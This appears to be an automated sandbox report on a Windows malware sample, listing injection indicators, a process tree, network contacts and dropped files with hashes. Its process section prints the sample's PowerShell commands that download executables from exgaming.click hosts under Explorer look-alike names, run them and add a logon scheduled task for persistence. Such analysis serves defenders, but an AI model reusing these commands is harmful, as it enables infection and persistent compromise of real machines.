N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2192 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2192 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2192 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2592 wrote to memory of 1996 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1996 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1996 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2192 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2192 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2192 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\System32\cmd.exe
PID 2192 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 2192 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 2192 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2600 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2600 wrote to memory of 2688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2408 wrote to memory of 2572 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2408 wrote to memory of 2572 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2408 wrote to memory of 2572 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2600 wrote to memory of 2464 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 2600 wrote to memory of 2464 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 2600 wrote to memory of 2464 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 2592 wrote to memory of 3048 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 3048 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 3048 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2464 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 2464 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 2464 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 2944 wrote to memory of 2924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 2924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 2924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1632 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1632 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1632 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1100 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1100 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1100 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 1660 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 1660 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 1660 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 448 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 448 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2944 wrote to memory of 448 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe

"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp3727.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

C:\Users\Admin\AppData\Roaming\system.exe

"C:\Users\Admin\AppData\Roaming\system.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

Network

Country Destination Domain Proto
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp

Files

memory/2192-0-0x0000000000DB0000-0x0000000000DC8000-memory.dmp

memory/2192-1-0x000007FEF5950000-0x000007FEF633C000-memory.dmp

memory/1996-7-0x000000001B850000-0x000000001BB32000-memory.dmp

memory/1996-8-0x0000000001E70000-0x0000000001E78000-memory.dmp

memory/1996-9-0x000007FEEDFB0000-0x000007FEEE94D000-memory.dmp

memory/1996-10-0x0000000002CC0000-0x0000000002D40000-memory.dmp

memory/1996-11-0x000007FEEDFB0000-0x000007FEEE94D000-memory.dmp

memory/1996-12-0x0000000002CC0000-0x0000000002D40000-memory.dmp

memory/1996-13-0x0000000002CC0000-0x0000000002D40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp3727.tmp.bat

MD5 da995218b014b0710cd684f4b17004d7
SHA1 b2b6678af1b19afc608c6a632be09e975d4d2b75
SHA256 58dc26ec3924579de22168382ad4e3b4aeee714df246c668fefb0d2c8536729f
SHA512 b453fdda361d71ef98a2ad3082c7f7ded4912ddc13ac7af912f52f19ff48f567363a824cf4e94511935b34466fb0fe33437e170a407023e58aae3dab202a300e

memory/2192-23-0x000007FEF5950000-0x000007FEF633C000-memory.dmp

memory/2192-24-0x0000000077590000-0x0000000077739000-memory.dmp

memory/1996-25-0x000007FEEDFB0000-0x000007FEEE94D000-memory.dmp

memory/1996-26-0x0000000002CCB000-0x0000000002D32000-memory.dmp

C:\Users\Admin\AppData\Roaming\system.exe

MD5 a7d63348cfe9b0dc9d3aaec28c76c8f0
SHA1 1b993f554960286e90cfd7cedf4c457e1c46ff80
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
SHA512 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010

memory/2464-30-0x00000000001D0000-0x00000000001E8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q125AZ11C0IGZMISVW8E.temp

MD5 5bedae33d43a46d566be309f7a9e8a42
SHA1 fa909fb005d680661b299930127f20a57dacc4ef
SHA256 b43b8da7e86ade79c51c2318fb1a43e6d440a50ecd7bb4b1b1d6e4246647fe34
SHA512 3b98e06f21b1d589cccffd7e546a37c780d22ad58ee2da4e37b39cb798f2555cc1d7281e31a029fe636fdc831edec8e3437f2529c3dfede69a364f9e8a5485ca

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

memory/2464-39-0x000007FEF4F60000-0x000007FEF594C000-memory.dmp

memory/3048-38-0x0000000001D80000-0x0000000001D88000-memory.dmp

memory/3048-37-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

memory/3048-41-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/2924-50-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/2464-51-0x000000001ACB0000-0x000000001AD30000-memory.dmp

memory/2924-52-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/2924-49-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/3048-48-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/3048-47-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/3048-42-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2924-55-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/2464-54-0x0000000077590000-0x0000000077739000-memory.dmp

memory/3048-53-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/3048-57-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/2924-56-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/536-73-0x0000000002DC0000-0x0000000002E40000-memory.dmp

memory/536-76-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/536-75-0x0000000002DC0000-0x0000000002E40000-memory.dmp

memory/536-74-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/1632-72-0x0000000002DF0000-0x0000000002E70000-memory.dmp

memory/1632-71-0x0000000002DF0000-0x0000000002E70000-memory.dmp

memory/1632-70-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/536-78-0x0000000002DC0000-0x0000000002E40000-memory.dmp

memory/1632-77-0x0000000002DF0000-0x0000000002E70000-memory.dmp

memory/1632-69-0x0000000002DF0000-0x0000000002E70000-memory.dmp

memory/1632-64-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/1632-79-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/1996-85-0x0000000002CC0000-0x0000000002D40000-memory.dmp

memory/1100-86-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/1100-87-0x0000000001E70000-0x0000000001EF0000-memory.dmp

memory/1100-88-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/2464-89-0x000007FEF4F60000-0x000007FEF594C000-memory.dmp

memory/1100-91-0x0000000001E70000-0x0000000001EF0000-memory.dmp

memory/1100-90-0x0000000001E70000-0x0000000001EF0000-memory.dmp

memory/1100-93-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/536-92-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/1660-103-0x0000000002D60000-0x0000000002DE0000-memory.dmp

memory/2464-104-0x0000000077590000-0x0000000077739000-memory.dmp

memory/1660-102-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/1660-101-0x0000000002D60000-0x0000000002DE0000-memory.dmp

memory/1660-100-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/2464-99-0x000000001ACB0000-0x000000001AD30000-memory.dmp

memory/1660-105-0x0000000002D60000-0x0000000002DE0000-memory.dmp

memory/1660-106-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp

memory/448-112-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/448-113-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/448-114-0x000007FEED450000-0x000007FEEDDED000-memory.dmp

memory/448-115-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/448-116-0x0000000002CB0000-0x0000000002D30000-memory.dmp